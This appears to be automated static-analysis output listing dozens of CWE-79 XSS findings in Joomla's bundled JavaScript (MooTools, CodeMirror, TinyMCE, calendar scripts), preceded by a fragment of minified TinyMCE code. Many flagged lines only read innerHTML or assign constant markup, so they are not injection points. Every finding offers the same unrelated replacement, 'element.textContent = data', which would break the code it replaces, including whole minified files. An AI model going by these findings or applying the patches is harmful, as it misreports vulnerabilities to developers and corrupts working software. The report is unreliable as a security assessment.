b=a.dom.getViewPort(window);a.editor.windowManager.resizeBy(a.getWindowArg("mce_width")-b.w,a.getWindowArg("mce_height")-b.h,a.id||window)},10)},executeOnLoad:function(s){this.onInit.add(function(){eval(s)})},storeSelection:function(){this.editor.windowManager.bookmark=tinyMCEPopup.editor.selection.getBookmark(1)},restoreSelection:function(){var a=tinyMCEPopup;if(!a.isWindow&&tinymce.isIE){a.editor.selection.moveToBookmark(a.editor.windowManager.bookmark)}},requireLangPack:function(){var b=this,a=b.getWindowArg("plugin_url")||b.getWindowArg("theme_url");if(a&&b.editor.settings.language&&b.features.translate_i18n!==false&&b.editor.settings.language_load!==false){a+="/langs/"+b.editor.settings.language+"_dlg.js";if(!tinymce.ScriptLoader.isDone(a)){document.write('<script type="text/javascript" src="'+tinymce._addVer(a)+'"><\/script>');tinymce.ScriptLoader.markDone(a)}}},pickColor:function(b,a){this.execCommand("mceColorPicker",true,{color:document.getElementById(a).value,func:function(e){document.getElementById(a).value=e;try{document.getElementById(a).onchange()}catch(d){}}})},openBrowser:function(a,c,b){tinyMCEPopup.restoreSelection();this.editor.execCallback("file_browser_callback",a,document.getElementById(a).value,c,window)},confirm:function(b,a,c){this.editor.windowManager.confirm(b,a,c,window)},alert:function(b,a,c){this.editor.windowManager.alert(b,a,c,window)},close:function(){var a=this;function b(){a.editor.windowManager.close(window);tinymce=tinyMCE=a.editor=a.params=a.dom=a.dom.doc=null}if(tinymce.isOpera){a.getWin().setTimeout(b,0)}else{b()}},_restoreSelection:function(){var a=window.event.srcElement;if(a.nodeName=="INPUT"&&(a.type=="submit"||a.type=="button")){tinyMCEPopup.restoreSelection()}},_onDOMLoaded:function(){var b=tinyMCEPopup,d=document.title,e,c,a;if(b.features.translate_i18n!==false){c=document.body.innerHTML;if(tinymce.isIE){c=c.replace(/ (value|title|alt)=([^"][^\s>]+)/gi,' $1="$2"')}document.dir=b.editor.getParam("directionality","");if((a=b.editor.translate(c))&&a!=c){document.body.innerHTML=a}if((a=b.editor.translate(d))&&a!=d){document.title=d=a}}if(!b.editor.getParam("browser_preferred_colors",false)||!b.isWindow){b.dom.addClass(document.body,"forceColors")}document.body.style.display="";if(tinymce.isIE){document.attachEvent("onmouseup",tinyMCEPopup._restoreSelection);b.dom.add(b.dom.select("head")[0],"base",{target:"_self"})}b.restoreSelection();b.resizeToInnerSize();if(!b.isWindow){b.editor.windowManager.setTitle(window,d)}else{window.focus()}if(!tinymce.isIE&&!b.isWindow){b.dom.bind(document,"focus",function(){b.editor.windowManager.focus(b.id)})}tinymce.each(b.dom.select("select"),function(f){f.onkeydown=tinyMCEPopup._accessHandler});tinymce.each(b.listeners,function(f){f.func.call(f.scope,b.editor)});if(b.getWindowArg("mce_auto_focus",true)){window.focus();tinymce.each(document.forms,function(g){tinymce.each(g.elements,function(f){if(b.dom.hasClass(f,"mceFocus")&&!f.disabled){f.focus();return false}})})}document.onkeyup=tinyMCEPopup._closeWinKeyHandler},_accessHandler:function(a){a=a||window.event;if(a.keyCode==13||a.keyCode==32){var b=a.target||a.srcElement;if(b.onchange){b.onchange()}return tinymce.dom.Event.cancel(a)}},_closeWinKeyHandler:function(a){a=a||window.event;if(a.keyCode==27){tinyMCEPopup.close()}},_eventProxy:function(a){return function(b){tinyMCEPopup.dom.events.callNativeHandler(a,b)}}};tinyMCEPopup.init();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1124

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:1124
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- cell.innerHTML = date.getWeekNumber();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2187

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:2187
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testNode.innerHTML = '<a class="MiX"></a>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L4004

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:4004
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- table.innerHTML = '<tr><td></td></tr>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L177

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:177
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- c.firstChild.className="b";z=(c.getElementsByClassName("b").length!=2);}catch(C){}try{c.innerHTML='<a class="a"></a><a class="f b a"></a>';y=(c.getElementsByClassName("a").length!=2);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L522

Insecure DOM Manipulation (XSS) in mootree-uncompressed.js

CWE-79
File Location: media/system/js/mootree-uncompressed.js:522
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- this.div.gadget.innerHTML = this.getImg( ( this.control.grid ? ( this.control.root == this ? (this.nodes.length ? 'R' : '') : (this.last?'L':'T') ) : '') + (this.nodes.length ? (this.open?'minus':'plus') : '') );
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1

Insecure DOM Manipulation (XSS) in mootree.js

CWE-79
File Location: media/system/js/mootree.js:1
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- var MooTreeIcon="I,L,Lminus,Lplus,Rminus,Rplus,T,Tminus,Tplus,_closed,_doc,_open,minus,plus".split(","),MooTreeControl=new Class({initialize:function(a,b){b.control=this;b.div=a.div;this.root=new MooTreeNode(b);this.index={};this.enabled=!0;this.theme=a.theme||"mootree.gif";this.loader=a.loader||{icon:"mootree_loader.gif",text:"Loading...",color:"#a0a0a0"};this.selected=null;this.mode=a.mode;this.grid=a.grid;this.onExpand=a.onExpand||new Function;this.onSelect=a.onSelect||new Function;this.onClick=a.onClick||new Function;this.root.update(!0)},insert:function(a){a.control=this;return this.root.insert(a)},select:function(a){this.onClick(a);a.onClick();this.selected!==a&&(this.selected&&(this.selected.select(!1),this.onSelect(this.selected,!1)),this.selected=a,a.select(!0),this.onSelect(a,!0))},expand:function(){this.root.toggle(!0,!0)},collapse:function(){this.root.toggle(!0,!1)},get:function(a){return this.index[a]||null},adopt:function(a,b){void 0===b&&(b=this.root);this.disable();this._adopt(a,b);b.update(!0);document.id(a).destroy();this.enable()},_adopt:function(a,b){e=document.id(a);for(var c=0,d=e.getChildren(),c=0;c<d.length;c++)if("LI"==d[c].nodeName){for(var f={text:""},i="",h=null,l=null,g=0,h=0,k=null,j=d[c].getChildren(),g=0;g<j.length;g++)switch(j[g].nodeName){case "A":for(h=0;h<j[g].childNodes.length;h++)switch(k=j[g].childNodes[h],k.nodeName){case "#text":f.text+=k.nodeValue;break;case "#comment":i+=k.nodeValue}f.data=j[g].getProperties("href","target","title","name");break;case "UL":l=j[g]}if(""!=f.label){f.data.url=f.data.href;if(""!=i){i=i.split(";");for(h=0;h<i.length;h++)g=i[h].trim().split(":"),2==g.length&&(f[g[0].trim()]=g[1].trim())}null!=d[c].id&&(f.id="node_"+d[c].id);h=b.insert(f);l&&this._adopt(l,h)}}},disable:function(){this.enabled=!1},enable:function(){this.enabled=!0;this.root.update(!0,!0)}}),MooTreeNode=new Class({initialize:function(a){this.text=a.text;this.id=a.id||null;this.nodes=[];this.parent=null;this.last=!0;this.control=a.control;this.selected=!1;this.color=a.color||null;this.data=a.data||{};this.onExpand=a.onExpand||new Function;this.onSelect=a.onSelect||new Function;this.onClick=a.onClick||new Function;this.open=a.open?!0:!1;this.icon=a.icon;this.openicon=a.openicon||this.icon;this.id&&(this.control.index[this.id]=this);this.div={main:(new Element("div")).addClass("mooTree_node"),indent:new Element("div"),gadget:new Element("div"),icon:new Element("div"),text:(new Element("div")).addClass("mooTree_text"),sub:new Element("div")};this.div.main.adopt(this.div.indent);this.div.main.adopt(this.div.gadget);this.div.main.adopt(this.div.icon);this.div.main.adopt(this.div.text);document.id(a.div).adopt(this.div.main);document.id(a.div).adopt(this.div.sub);this.div.gadget._node=this;this.div.gadget.onclick=this.div.gadget.ondblclick=function(){this._node.toggle()};this.div.icon._node=this.div.text._node=this;this.div.icon.onclick=this.div.icon.ondblclick=this.div.text.onclick=this.div.text.ondblclick=function(){this._node.control.select(this._node)}},insert:function(a){a.div=this.div.sub;a.control=this.control;a=new MooTreeNode(a);a.parent=this;var b=this.nodes;b.length&&(b[b.length-1].last=!1);b.push(a);a.update();1==b.length&&this.update();1<b.length&&b[b.length-2].update(!0);return a},remove:function(){var a=this.parent;this._remove();a.update(!0)},_remove:function(){for(var a=this.nodes;a.length;)a[a.length-1]._remove();delete this.control.index[this.id];this.div.main.destroy();this.div.sub.destroy();this.parent&&(a=this.parent.nodes,a.erase(this),a.length&&(a[a.length-1].last=!0))},clear:function(){for(this.control.disable();this.nodes.length;)this.nodes[this.nodes.length-1].remove();this.control.enable()},update:function(a,b){var c=!0;this.control.enabled||(this.invalidated=!0,c=!1);b&&(this.invalidated?this.invalidated=!1:c=!1);if(c){this.div.main.className="mooTree_node"+(this.selected?" mooTree_selected":"");for(var c=this,d="";c.parent;)c=c.parent,d=this.getImg(c.last||!this.control.grid?"":"I")+d;this.div.indent.innerHTML=d;c=this.div.text;c.empty();c.appendText(this.text);this.color&&(c.style.color=this.color);this.div.icon.innerHTML=this.getImg(this.nodes.length?this.open?this.openicon||this.icon||"_open":this.icon||"_closed":this.icon||("folders"==this.control.mode?"_closed":"_doc"));this.div.gadget.innerHTML=this.getImg((this.control.grid?this.control.root==this?this.nodes.length?"R":"":this.last?"L":"T":"")+(this.nodes.length?this.open?"minus":"plus":""));this.div.sub.style.display=this.open?"block":"none"}a&&this.nodes.forEach(function(a){a.update(!0,b)})},getImg:function(a){var b='<div class="mooTree_img"';if(""!=a){var c=this.control.theme,d=MooTreeIcon.indexOf(a);-1==d&&(a=a.split("#"),c=a[0],d=2==a.length?parseInt(a[1])-1:0);b+=' style="background-image:url('+c+"); background-position:-"+18*d+'px 0px;"'}return b+"></div>"},toggle:function(a,b){this.open=void 0===b?!this.open:b;this.update();this.onExpand(this.open);this.control.onExpand(this,this.open);a&&this.nodes.forEach(function(a){a.toggle(!0,this.open)},this)},select:function(a){this.selected=a;this.update();this.onSelect(a)},load:function(a,b){this.loading||(this.loading=!0,this.toggle(!1,!0),this.clear(),this.insert(this.control.loader),function(){(new Request({method:"GET",url:a,onSuccess:this._loaded.bind(this),onFailure:this._load_err.bind(this)})).send(b||"")}.bind(this).delay(20))},_loaded:function(a,b){this.control.disable();this.clear();this._import(b.documentElement);this.control.enable();this.loading=!1},_import:function(a){for(var a=a.childNodes,b=0;b<a.length;b++)if("node"==a[b].tagName){for(var c={data:{}},d=a[b].attributes,f=0;f<d.length;f++)switch(d[f].name){case "text":case "id":case "icon":case "openicon":case "color":case "open":c[d[f].name]=d[f].value;break;default:c.data[d[f].name]=d[f].value}c=this.insert(c);c.data.load&&(c.open=!1,c.insert(this.control.loader),c.onExpand=function(){this.load(this.data.load);this.onExpand=new Function});a[b].childNodes.length&&c._import(a[b])}},_load_err:function(){window.alert("Error loading: "+this.text)}});
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L338

Insecure DOM Manipulation (XSS) in codemirror-uncompressed.js

CWE-79
File Location: media/editors/codemirror/js/codemirror-uncompressed.js:338
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- var num = div == nums ? NaN : Number(div.innerHTML);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L409

Insecure DOM Manipulation (XSS) in codemirror-uncompressed.js

CWE-79
File Location: media/editors/codemirror/js/codemirror-uncompressed.js:409
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- changes[i].innerHTML = changes[i + 1];
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L33

Insecure DOM Manipulation (XSS) in advlink.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/advlink.js:33
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('targetlistcontainer').innerHTML = getTargetListHTML('targetlist','target');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L95

Insecure DOM Manipulation (XSS) in table.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/table/js/table.js:95
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- capEl.innerHTML = '<br data-mce-bogus="1"/>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L296

Insecure DOM Manipulation (XSS) in table.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/table/js/table.js:296
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('backgroundimagebrowsercontainer').innerHTML = getBrowserHTML('backgroundimagebrowser','backgroundimage','image','table');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L297

Insecure DOM Manipulation (XSS) in table.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/table/js/table.js:297
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('bordercolor_pickcontainer').innerHTML = getColorPickerHTML('bordercolor_pick','bordercolor');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L206

Insecure DOM Manipulation (XSS) in color_picker.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/color_picker.js:206
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- el.innerHTML = h;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L113

Insecure DOM Manipulation (XSS) in calendar-setup-uncompressed.js

CWE-79
File Location: media/system/js/calendar-setup-uncompressed.js:113
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- p.displayArea.innerHTML = cal.date.print(p.daFormat);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L159

Insecure DOM Manipulation (XSS) in calendar-setup-uncompressed.js

CWE-79
File Location: media/system/js/calendar-setup-uncompressed.js:159
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- params.date = Date.parseDate(dateEl.value || dateEl.innerHTML, dateFmt);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L422

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:422
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- el.innerHTML = newval;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L573

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:573
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- el.calendar.tooltips.innerHTML = _TT["SEL_DATE"];
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L898

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:898
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- AP.innerHTML = pm ? "pm" : "am";
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2162

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:2162
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testNode.innerHTML = '<a class="f"></a><a class="b"></a>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L176

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:176
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- s.idGetsName=w.getElementById(v)===c.firstChild;}catch(C){}if(c.getElementsByClassName){try{c.innerHTML='<a class="f"></a><a class="b"></a>';c.getElementsByClassName("b").length;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L510

Insecure DOM Manipulation (XSS) in mootree-uncompressed.js

CWE-79
File Location: media/system/js/mootree-uncompressed.js:510
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- this.div.indent.innerHTML = i;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L207

Insecure DOM Manipulation (XSS) in hide.js

CWE-79
File Location: templates/beez5/javascript/hide.js:207
Security Score:
71 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- grafik.innerHTML = rightopen;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L181

Insecure DOM Manipulation (XSS) in update.js

CWE-79
File Location: media/com_joomlaupdate/update.js:181
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('extbytesout').innerHTML = new Number(joomlaupdate_stat_outbytes).format();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L40

Insecure DOM Manipulation (XSS) in advlink.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/advlink.js:40
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById("linklisthrefcontainer").innerHTML = html;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L198

Insecure DOM Manipulation (XSS) in fullpage.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/js/fullpage.js:198
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('bgcolor_pickcontainer').innerHTML = getColorPickerHTML('bgcolor_pick','bgcolor');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L200

Insecure DOM Manipulation (XSS) in fullpage.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/js/fullpage.js:200
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('visited_color_pickcontainer').innerHTML = getColorPickerHTML('visited_color_pick','visited_color');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L9

Insecure DOM Manipulation (XSS) in cell.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/table/js/cell.js:9
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('backgroundimagebrowsercontainer').innerHTML = getBrowserHTML('backgroundimagebrowser','backgroundimage','image','table');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L8

Insecure DOM Manipulation (XSS) in template.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/template/js/template.js:8
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.write('<sc'+'ript language="javascript" type="text/javascript" src="' + tinyMCEPopup.editor.documentBaseURI.toAbsolute(url) + '"></sc'+'ript>');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L362

Insecure DOM Manipulation (XSS) in charmap.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/charmap.js:362
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- elmN.innerHTML = codeN;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1

Insecure DOM Manipulation (XSS) in calendar-setup.js

CWE-79
File Location: media/system/js/calendar-setup.js:1
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- Calendar.setup=function(g){function f(h,i){if(typeof g[h]=="undefined"){g[h]=i}}f("inputField",null);f("displayArea",null);f("button",null);f("eventName","click");f("ifFormat","%Y/%m/%d");f("daFormat","%Y/%m/%d");f("singleClick",true);f("disableFunc",null);f("dateStatusFunc",g.disableFunc);f("dateTooltipFunc",null);f("dateText",null);f("firstDay",null);f("align","Br");f("range",[1900,2999]);f("weekNumbers",true);f("flat",null);f("flatCallback",null);f("onSelect",null);f("onClose",null);f("onUpdate",null);f("date",null);f("showsTime",false);f("timeFormat","24");f("electric",true);f("step",2);f("position",null);f("cache",false);f("showOthers",false);f("multiple",null);var c=["inputField","displayArea","button"];for(var b in c){if(typeof g[c[b]]=="string"){g[c[b]]=document.getElementById(g[c[b]])}}if(!(g.flat||g.multiple||g.inputField||g.displayArea||g.button)){alert("Calendar.setup:\n Nothing to setup (no fields found). Please check your code");return false}function a(i){var h=i.params;var j=(i.dateClicked||h.electric);if(j&&h.inputField){h.inputField.value=i.date.print(h.ifFormat);if(typeof h.inputField.onchange=="function"){h.inputField.onchange()}}if(j&&h.displayArea){h.displayArea.innerHTML=i.date.print(h.daFormat)}if(j&&typeof h.onUpdate=="function"){h.onUpdate(i)}if(j&&h.flat){if(typeof h.flatCallback=="function"){h.flatCallback(i)}}if(j&&h.singleClick&&i.dateClicked){i.callCloseHandler()}}if(g.flat!=null){if(typeof g.flat=="string"){g.flat=document.getElementById(g.flat)}if(!g.flat){alert("Calendar.setup:\n Flat specified but can't find parent.");return false}var e=new Calendar(g.firstDay,g.date,g.onSelect||a);e.setDateToolTipHandler(g.dateTooltipFunc);e.showsOtherMonths=g.showOthers;e.showsTime=g.showsTime;e.time24=(g.timeFormat=="24");e.params=g;e.weekNumbers=g.weekNumbers;e.setRange(g.range[0],g.range[1]);e.setDateStatusHandler(g.dateStatusFunc);e.getDateText=g.dateText;if(g.ifFormat){e.setDateFormat(g.ifFormat)}if(g.inputField&&typeof g.inputField.value=="string"){e.parseDate(g.inputField.value)}e.create(g.flat);e.show();return false}var d=g.button||g.displayArea||g.inputField;d["on"+g.eventName]=function(){var h=g.inputField||g.displayArea;var k=g.inputField?g.ifFormat:g.daFormat;var o=false;var m=window.calendar;if(h){g.date=Date.parseDate(h.value||h.innerHTML,k)}if(!(m&&g.cache)){window.calendar=m=new Calendar(g.firstDay,g.date,g.onSelect||a,g.onClose||function(i){i.hide()});m.setDateToolTipHandler(g.dateTooltipFunc);m.showsTime=g.showsTime;m.time24=(g.timeFormat=="24");m.weekNumbers=g.weekNumbers;o=true}else{if(g.date){m.setDate(g.date)}m.hide()}if(g.multiple){m.multiple={};for(var j=g.multiple.length;--j>=0;){var n=g.multiple[j];var l=n.print("%Y%m%d");m.multiple[l]=n}}m.showsOtherMonths=g.showOthers;m.yearStep=g.step;m.setRange(g.range[0],g.range[1]);m.params=g;m.setDateStatusHandler(g.dateStatusFunc);m.getDateText=g.dateText;m.setDateFormat(k);if(o){m.create()}m.refresh();if(!g.position){m.showAtElement(g.button||g.displayArea||g.inputField,g.align)}else{m.showAt(g.position[0],g.position[1])}return false};return e};
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2207

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:2207
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testNode.innerHTML = '<form action="s"><input id="action"/></form>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L3991

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:3991
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- div.innerHTML = '<nav></nav>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L4048

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:4048
Security Score:
70 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testForm.innerHTML = '<select><option>s</option></select>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2

Insecure DOM Manipulation (XSS) in codemirror.js

CWE-79
File Location: media/editors/codemirror/js/codemirror.js:2
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- "this.previousSibling.offsetHeight + 'px'")}catch(f){}c.style.top="0px";c.style.left="0px";c.style.overflow="hidden";a.appendChild(c);e.className="CodeMirror-line-numbers";c.appendChild(e);e.innerHTML="<div>"+b+"</div>";return c}function G(a){if(typeof a.parserfile=="string")a.parserfile=[a.parserfile];if(typeof a.basefiles=="string")a.basefiles=[a.basefiles];if(typeof a.stylesheet=="string")a.stylesheet=[a.stylesheet];var b=' spellcheck="'+(a.disableSpellcheck?"false":"true")+'"',c=['<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html'+
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L73

Insecure DOM Manipulation (XSS) in image.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/js/image.js:73
Security Score:
69 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('onmouseoutsrccontainer').innerHTML = getBrowserHTML('outbrowser','onmouseoutsrc','image','theme_advanced_image');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L13

Insecure DOM Manipulation (XSS) in advlink.js

CWE-79
